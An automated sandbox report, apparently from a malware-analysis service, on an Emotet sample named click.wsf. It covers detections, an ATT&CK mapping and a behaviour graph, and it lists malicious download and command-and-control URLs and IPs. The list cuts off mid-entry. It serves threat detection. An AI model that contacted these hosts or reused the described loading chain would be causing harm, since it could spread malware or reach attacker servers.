        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0000000180001D98

        Stealing of Sensitive Information

        barindex
        Yara detected Emotet
        Source: Yara matchFile source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts12
        Scripting        		1
        DLL Side-Loading        		111
        Process Injection        		21
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Virtualization/Sandbox Evasion        		LSASS Memory121
        Security Software Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Non-Standard Port        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
        Process Injection        		Security Account Manager1
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Ingress Tool Transfer        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
        Scripting        		NTDS2
        Process Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer4
        Non-Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Hidden Files and Directories        		LSA Secrets1
        Remote System Discovery        		SSHKeyloggingData Transfer Size Limits115
        Application Layer Protocol        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common2
        Obfuscated Files or Information        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Regsvr32        		DCSync24
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830321 Sample: click.wsf Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 31 129.232.188.93 xneeloZA South Africa 2->31 33 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->33 35 37 other IPs or domains 2->35 57 Snort IDS alert for network traffic 2->57 59 Multi AV Scanner detection for domain / URL 2->59 61 Antivirus detection for URL or domain 2->61 63 4 other signatures 2->63 8 wscript.exe 4 2->8         started        13 OUTLOOK.EXE 46 3 2->13         started        signatures3 process4 dnsIp5 43 gomespontes.com.br 186.202.153.5, 443, 49729 LocawebServicosdeInternetSABR Brazil 8->43 45 penshorn.org 203.26.41.131, 443, 49727 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 8->45 53 2 other IPs or domains 8->53 23 C:\Users\user\Desktop\rad75349.tmp.dll, PE32+ 8->23 dropped 25 C:\Users\user\Desktop\rad1F9A4.tmp.dll, HTML 8->25 dropped 27 C:\Users\user\Desktop\click.wsf, ASCII 8->27 dropped 67 System process connects to network (likely due to code injection or exploit) 8->67 69 Benign windows process drops PE files 8->69 71 VBScript performs obfuscated calls to suspicious functions 8->71 15 regsvr32.exe 2 8->15         started        47 52.109.13.63, 443, 49720 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->47 49 52.109.76.141, 443, 49717 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->49 51 192.229.221.95, 49707, 49716, 49724 EDGECASTUS United States 13->51 file6 signatures7 process8 file9 29 C:\Windows\System32\...\xhwdmo.dll (copy), PE32+ 15->29 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->55 19 regsvr32.exe 15->19         started        signatures10 process11 dnsIp12 37 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 19->37 39 91.121.146.47, 49731, 8080 OVHFR France 19->39 41 7 other IPs or domains 19->41 65 System process connects to network (likely due to code injection or exploit) 19->65 signatures13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\Desktop\rad75349.tmp.dll79%ReversingLabsWin64.Trojan.Emotet
        C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)79%ReversingLabsWin64.Trojan.Emotet

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        3.2.regsvr32.exe.460000.0.unpack100%AviraHEUR/AGEN.1215476Download File

        Domains

        SourceDetectionScannerLabelLink
        bbvoyage.com9%VirustotalBrowse
        gomespontes.com.br2%VirustotalBrowse
        penshorn.org14%VirustotalBrowse
        www.gomespontes.com.br5%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
        http://wrappixels.co0%Avira URL Cloudsafe
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0100%Avira URL Cloudmalware
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/0%Avira URL Cloudsafe
        https://160.16.142.56:8080/M0%Avira URL Cloudsafe
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnX100%Avira URL Cloudmalware
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/X100%Avira URL Cloudmalware
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bK100%Avira URL Cloudmalware
        https://104.168.155.143:8080/Y100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/z100%Avira URL Cloudmalware
        https://163.44.196.120:8080/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
        https://167.172.199.165:8080/l100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006100%Avira URL Cloudmalware
        https://167.172.199.165:8080/100%Avira URL Cloudmalware
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgz100%Avira URL Cloudmalware
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/s0%Avira URL Cloudsafe
        http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
        https://164.90.222.65/)100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//0%Avira URL Cloudsafe
        https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
        https://104.168.155.143:8080/4100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/0%Avira URL Cloudsafe
        https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
        https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
        https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
        http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
        https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLL100%Avira URL Cloudmalware
        http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dll100%Avira URL Cloudmalware
        https://104.168.155.143:8080/P100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/l100%Avira URL Cloudmalware
        https://104.168.155.143:8080/100%Avira URL Cloudmalware
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
        https://160.16.142.56:8080/0%Avira URL Cloudsafe
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/100%Avira URL Cloudmalware
        https://penshorn.org/admin/Ses8712iGR8du/95DC4.tmp.dll(100%Avira URL Cloudmalware
        https://www.gomespontes.com.br/logs/pd/0w100%Avira URL Cloudmalware
        http://softwareulike.com/cWIYxWMPkK/_100%Avira URL Cloudmalware
        https://160.16.142.56:8080/)0%Avira URL Cloudsafe
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/476100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bbvoyage.com
        		31.31.196.172
        		truetrueunknown
        gomespontes.com.br
        		186.202.153.5
        		truetrueunknown
        penshorn.org
        		203.26.41.131
        		truetrueunknown
        www.gomespontes.com.br
        		unknown
        		unknowntrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/true
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/true
        • Avira URL Cloud: malware
        		unknown
        https://164.90.222.65/wfqhlvcfruxkwghn/ivirkxueekmcz/true
        • Avira URL Cloud: malware
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/true
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/H#K#0wscript.exe, 00000001.00000003.1417301254.000002D845C83000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.cowscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/Mregsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D68000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/VnXregsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/Xregsvr32.exe, 00000004.00000003.1868438531.0000000000D08000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/Yregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/bKregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000CF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000CE0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/zregsvr32.exe, 00000004.00000002.2661608245.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/vMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/cw34006wscript.exe, 00000001.00000003.1531992780.000002D8464BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552238532.000002D8464BB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/lregsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://91.121.146.47:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/dllgzregsvr32.exe, 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://187.63.160.88:80/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://163.44.196.120:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/swscript.exe, 00000001.00000002.1554710807.000002D846747000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D8466F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://164.90.222.65/)regsvr32.exe, 00000004.00000003.2367342315.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://160.16.142.56:8080/wfqhlvcfruxkwghn/ivirkxueekmcz//regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/4regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/wscript.exe, 00000001.00000003.1537553114.000002D84656F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542696917.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540601110.000002D846570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1534710579.000002D846568000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1545756551.000002D846570000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        		unknown
        https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        https://66.228.32.31:7080/wfqhlvcfruxkwghn/ivirkxueekmcz/.DLLregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519488621.000002D846065000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845E94000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        		unknown
        http://softwareulike.com/cWIYxWMPkK/yMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://167.172.199.165:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000003.2367342315.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/wfqhlvcfruxkwghn/ivirkxueekmcz/regsvr32.exe, 00000004.00000002.2661608245.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/dllwscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        http://ozmeydan.com/cekici/9/xMwscript.exe, 00000001.00000003.1417227468.000002D845C90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542741778.000002D845C90000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/Pregsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://www.gomespontes.com.br/logs/pd/lwscript.exe, 00000001.00000002.1551840814.000002D84606B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514223112.000002D84605E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://104.168.155.143:8080/regsvr32.exe, 00000004.00000002.2661608245.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        		unknown
        https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wscript.exe, wscript.exe, 00000001.00000003.1529404109.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1521966849.000002D84626F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D846412000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1505842083.000002D845E4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526888779.000002D8462D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1526294634.000002D84631A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1528804146.000002D8462B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1509441394.000002D845E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507610198.000002D845DF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845ED2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1548494229.000002D8463EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1504930637.000002D8466C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1514390296.000002D84600D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1507946268.000002D845EB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1511499007.000002D845F4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1527492027.000002D846291000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 